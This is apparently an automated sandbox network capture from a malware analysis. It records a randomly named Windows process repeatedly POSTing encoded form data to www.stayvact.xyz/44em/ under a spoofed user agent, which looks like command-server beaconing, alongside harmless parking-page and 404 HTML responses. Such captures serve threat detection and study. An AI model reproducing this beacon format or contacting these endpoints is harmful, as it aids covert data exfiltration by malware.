                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:40.381932974 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 11:58:40.382004023 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 11:58:40.382069111 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 11:58:40.382134914 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 11:58:40.382222891 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 11:58:40.382335901 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 11:58:40.382411957 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 11:58:40.382512093 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 11:58:40.382601976 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.11.2049741199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:45.760219097 CEST684OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 32 41 68 73 7a 73 36 51 4e 45 42 77 58 43 57 78 32 6b 6d 77 4a 67 37 30 75 43 44 53 2f 79 51 5a 6d 50 79 37 34 7a 68 52 52 72 79 50 35 6a 7a 4f 6d 4d 4a 4b 2f 4f 44 62 69 69 6d 37 51 72 2f 6a 53 4e 6b 44 6e 68 51 30 71 6e 66 76 7a 44 56 33 50 69 47 67 39 77 52 63 58 41 69 38 34 51 4b 4e 45 45 65 53 66 6b 2f 56 39 35 4c 4b 71 38 6e 7a 51 50 52 37 6e 57 66 36 46 61 44 38 72 53 38 6a 6e 49 6e 33 67 78 35 50 54 7a 57 74 67 45 4a 59 2f 42 70 37 54 2b 36 75 45 65 70 77 56 34 67 48 2f 38 63 77 50 53 68 73 72 47 6a 66 67 46 70 75 53 78 2f 61 42 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm2Ahszs6QNEBwXCWx2kmwJg70uCDS/yQZmPy74zhRRryP5jzOmMJK/ODbiim7Qr/jSNkDnhQ0qnfvzDV3PiGg9wRcXAi84QKNEEeSfk/V95LKq8nzQPR7nWf6FaD8rS8jnIn3gx5PTzWtgEJY/Bp7T+6uEepwV4gH/8cwPShsrGjfgFpuSx/aBQ==
                                                                                                                                                    Oct 4, 2024 11:58:45.962210894 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:45 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:45.962313890 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 11:58:45.962435961 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 11:58:45.962517977 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 11:58:45.962580919 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
                                                                                                                                                    Oct 4, 2024 11:58:45.962656021 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 11:58:45.962738037 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 11:58:45.962800026 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 11:58:45.962857962 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 11:58:45.962919950 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="
                                                                                                                                                    Oct 4, 2024 11:58:46.146996975 CEST1289INData Raw: 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: 269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="roun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    10192.168.11.2049742199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:48.466025114 CEST704OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 30 68 52 73 78 4b 79 51 61 55 42 7a 64 69 57 78 34 45 6d 30 4a 67 33 30 75 44 58 43 2b 41 6b 5a 6d 76 43 37 35 32 4e 52 63 4c 79 50 74 54 79 4b 70 73 4a 4e 2f 50 2f 54 69 6d 6d 37 51 72 72 6a 53 50 4d 44 6e 79 49 33 34 48 66 74 36 6a 56 31 4c 69 47 67 39 77 52 63 58 44 65 43 34 51 53 4e 46 30 4f 53 4f 31 2f 57 77 5a 4c 4a 36 73 6e 7a 48 66 52 2f 6e 57 66 4d 46 61 7a 57 72 52 45 6a 6e 49 33 33 6e 6b 55 5a 5a 7a 58 6d 76 6b 49 6e 79 41 59 77 64 4b 7a 64 4c 38 68 41 52 71 45 47 33 4b 4e 71 53 67 56 49 6f 56 2f 74 6b 31 51 47 51 7a 2b 42 63 62 78 38 30 51 78 52 54 72 69 55 55 35 4d 65 63 46 4e 4c 54 47 38 3d
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AkZmvC752NRcLyPtTyKpsJN/P/Timm7QrrjSPMDnyI34Hft6jV1LiGg9wRcXDeC4QSNF0OSO1/WwZLJ6snzHfR/nWfMFazWrREjnI33nkUZZzXmvkInyAYwdKzdL8hARqEG3KNqSgVIoV/tk1QGQz+Bcbx80QxRTriUU5MecFNLTG8=
                                                                                                                                                    Oct 4, 2024 11:58:48.664613962 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:48 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:48.664714098 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 11:58:48.664840937 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 11:58:48.664937019 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 11:58:48.665014029 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
